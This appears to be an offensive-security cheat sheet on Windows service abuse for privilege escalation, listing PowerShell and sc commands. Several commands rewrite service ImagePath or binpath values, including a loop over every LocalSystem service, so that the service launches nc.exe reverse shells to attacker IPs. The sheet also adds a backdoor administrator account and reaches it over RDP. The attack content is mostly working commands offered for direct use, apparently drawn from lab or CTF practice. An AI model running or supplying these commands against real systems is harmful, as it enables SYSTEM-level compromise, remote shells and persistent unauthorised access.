Abusing Services

Powershell

Below is an example on how to abuse the Windows Update Service

# Show all services
Get-Service

# Show details of the services
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\*

# Shows details about the specific service
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\services\wuauserv 

DependOnService     : {rpcss}                                                                                                                                                                 
Description         : @%systemroot%\system32\wuaueng.dll,-106                                                                                                                                 
DisplayName         : @%systemroot%\system32\wuaueng.dll,-105                                                                                                                                 
ErrorControl        : 1                                                                                                                                                                       
FailureActions      : {128, 81, 1, 0...}                                                                                                                                                      
ImagePath           : C:\Windows\system32\svchost.exe -k netsvcs -p
ObjectName          : LocalSystem
RequiredPrivileges  : {SeAuditPrivilege, SeCreateGlobalPrivilege, SeCreatePageFilePrivilege, SeTcbPrivilege...}
ServiceSidType      : 1
Start               : 3
SvcMemHardLimitInMB : 246
SvcMemMidLimitInMB  : 167
SvcMemSoftLimitInMB : 88
Type                : 32
PSPath              : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services\wuauserv
PSParentPath        : Microsoft.PowerShell.Core\Registry::HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\services
PSChildName         : wuauserv
PSDrive             : HKLM
PSProvider          : Microsoft.PowerShell.Core\Registry

# Sets properties on the service
Set-Itemproperty -path 'HKLM:\system\currentcontrolset\services\wuauserv' -Name 'ImagePath' -value 'c:\temp\nc.exe 10.10.14.23 9001 -e powershell.exe' 

Powershell Services Commands

Get all the details about the service. useful to see if you can stop and start etc...

get-service UsoSvc | Select-Object *
get-service wuauserv | select Displayname,Status,ServiceName,Can*
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services\* | Select-Object DisplayName, PSChildName, ImagePath  

Controlling the services

# Starts
Start-Service wuauserv

# Restarts
Restart-Service wuauserv

# Stops the service
Stop-Service wuauserv

# Script
Get-ItemProperty HKLM:\SYSTEM\CurrentControlSet\Services* | ?{$.ObjectName -like "LocalSystem"} | Select PSChildName,ImagePath | ForEach-Object {$srvname=$.PSChildName;Set-ItemProperty "HKLM:\SYSTEM\CurrentControlSet\Services$srvname" -name ImagePath -Value 'C:\tmp\nc.exe 10.10.16.28 4444 -e powershell.exe'}  

Get-Service: Checking Windows Services Status with PowerShell – TheITBrosTheITBros.com

Service Control

Example 1: Using the Service Control to abuse Universal Plug and Play Service

sc config upnphost binpath= "C:\Inetpub\wwwroot\nc.exe 10.11.0.47 9097 -e C:\WINDOWS\System32\cmd.exe"
sc config upnphost obj= ".\LocalSystem" password= ""
sc qc upnphost

# In the event of failure
sc config SSDPSRV start= autonet 
start SSDPSRVnet 

# Start the reverse shell with priviledges
start upnphost


1) Created a user
  net user wtf wtf123 /add
  net localgroup administrators wtf /add
     
2) rdesktop -u wtf 10.11.1.13

Example 2: Application Host Helper Service

sc query AppHostSvc
sc config AppHostSvc binpath="c:\temp\nc.exe -e cmd 10.10.14.37 9002"
sc stop AppHostSvc
sc start AppHostSvc

SC Commands

sc queryex type= service state= all

state= all: Returns a list of all services
state= inactive: Returns a list of stopped services

To get a start of all running services only, do not include the ‘state’ field.
sc queryex type= service

   commands:
          query  [qryOpt]   Show status
          queryEx [qryOpt]  Show extended info - pid, flags
          GetDisplayName    Show the DisplayName
          GetKeyName        Show the ServiceKeyName
          EnumDepend        Show Dependencies
          qc                Show config - dependencies, full path etc
          start          START a service.
          stop           STOP a service
          pause          PAUSE a service.
          continue       CONTINUE a service.
          create         Create a service. (add it to the registry)
          config         permanently change the service configuration
          delete         Delete a service (from the registry)
          control        Send a control to a service
          interrogate    Send an INTERROGATE control request to a service
          Qdescription   Query the description of a service
          description    Change the description of a service
          Qfailure       Query the actions taken by a service upon failure
          failure        Change the actions taken by a service upon failure
          sdShow         Display a service's security descriptor using SDDL
          SdSet          Sets a service's security descriptor using SDDL